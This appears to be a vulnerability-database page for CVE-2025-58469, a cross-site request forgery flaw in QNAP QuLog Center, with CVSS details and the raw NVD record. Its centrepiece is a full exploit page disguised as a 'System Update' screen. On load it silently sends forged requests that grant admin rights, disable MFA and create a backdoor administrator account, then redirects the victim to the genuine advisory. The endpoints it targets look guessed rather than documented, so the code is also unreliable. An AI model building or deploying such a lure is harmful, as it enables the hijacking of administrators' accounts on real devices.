Security Vulnerability Report
中文
CVE-2025-58469 CVSS 8.8 HIGH

CVE-2025-58469

Published: 2025-11-07 16:15:41
Last Modified: 2025-11-14 18:22:24
Source: [email protected]

Description

A cross-site request forgery (CSRF) vulnerability has been reported to affect QuLog Center. The remote attackers can then exploit the vulnerability to gain privileges or hijack user identities. We have already fixed the vulnerability in the following version: QuLog Center 1.8.2.927 ( 2025/09/17 ) and later

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:qulog_center:*:*:*:*:*:*:*:* - VULNERABLE
QuLog Center < 1.8.2.927

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-58469 Target: QNAP QuLog Center Vulnerability: Cross-Site Request Forgery This PoC demonstrates how an attacker can exploit the CSRF vulnerability to modify user privileges or hijack user identity. Note: This is for educational and authorized testing purposes only. --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>QNAP QuLog Center - System Update</title> <style> body { font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background: #f0f0f0; } .container { background: white; padding: 40px; border-radius: 10px; box-shadow: 0 4px 6px rgba(0,0,0,0.1); text-align: center; } .loader { border: 4px solid #f3f3f3; border-top: 4px solid #3498db; border-radius: 50%; width: 40px; height: 40px; animation: spin 2s linear infinite; margin: 20px auto; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } .hidden-form { display: none; } </style> </head> <body> <div class="container"> <h2>QuLog Center System Update</h2> <p>Please wait while we process your request...</p> <div class="loader"></div> <p id="status"></p> </div> <!-- Hidden CSRF forms targeting different QuLog Center endpoints --> <!-- Form 1: Privilege modification --> <form id="csrfForm1" class="hidden-form" action="https://target:8080/cgi-bin/qulog_center/api/user/privilege" method="POST" enctype="text/plain"> <input type="hidden" name="username" value="attacker_controlled" /> <input type="hidden" name="privilege" value="admin" /> <input type="hidden" name="action" value="modify" /> </form> <!-- Form 2: Session hijacking via configuration change --> <form id="csrfForm2" class="hidden-form" action="https://target:8080/cgi-bin/qulog_center/api/config/session" method="POST"> <input type="hidden" name="session_timeout" value="86400" /> <input type="hidden" name="enable_mfa" value="false" /> </form> <!-- Form 3: Create new admin user --> <form id="csrfForm3" class="hidden-form" action="https://target:8080/cgi-bin/qulog_center/api/user/create" method="POST"> <input type="hidden" name="username" value="backdoor_admin" /> <input type="hidden" name="password" value="P@ssw0rd123!" /> <input type="hidden" name="role" value="administrator" /> </form> <script> // Auto-submit CSRF forms sequentially async function exploitCSRF() { const forms = ['csrfForm1', 'csrfForm2', 'csrfForm3']; const statusEl = document.getElementById('status'); for (let i = 0; i < forms.length; i++) { try { statusEl.textContent = `Executing request ${i + 1} of ${forms.length}...`; const form = document.getElementById(forms[i]); // Submit form via fetch to handle CORS (if applicable) const formData = new FormData(form); const response = await fetch(form.action, { method: 'POST', mode: 'no-cors', // Bypass CORS for CSRF body: formData, credentials: 'include' // Include cookies }); // Small delay between requests await new Promise(resolve => setTimeout(resolve, 500)); } catch (error) { console.log('Request ' + (i+1) + ' sent (response may be opaque)'); } } statusEl.textContent = 'Update completed. You can close this page.'; // Redirect to legitimate QNAP page after "completion" setTimeout(() => { window.location.href = 'https://www.qnap.com/en/security-advisory/qsa-25-42'; }, 2000); } // Execute on page load window.onload = exploitCSRF; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58469", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:41.387", "lastModified": "2025-11-14T18:22:24.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site request forgery (CSRF) vulnerability has been reported to affect QuLog Center. The remote attackers can then exploit the vulnerability to gain privileges or hijack user identities.\n\nWe have already fixed the vulnerability in the following version:\nQuLog Center 1.8.2.927 ( 2025/09/17 ) and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.2, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qulog_center:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.8.0.872", "versionEndExcluding": "1.8.2.923", "matchCriteriaId": "82A326B6-A078-4861-A5AF-1190E25B9DF7"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-42", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.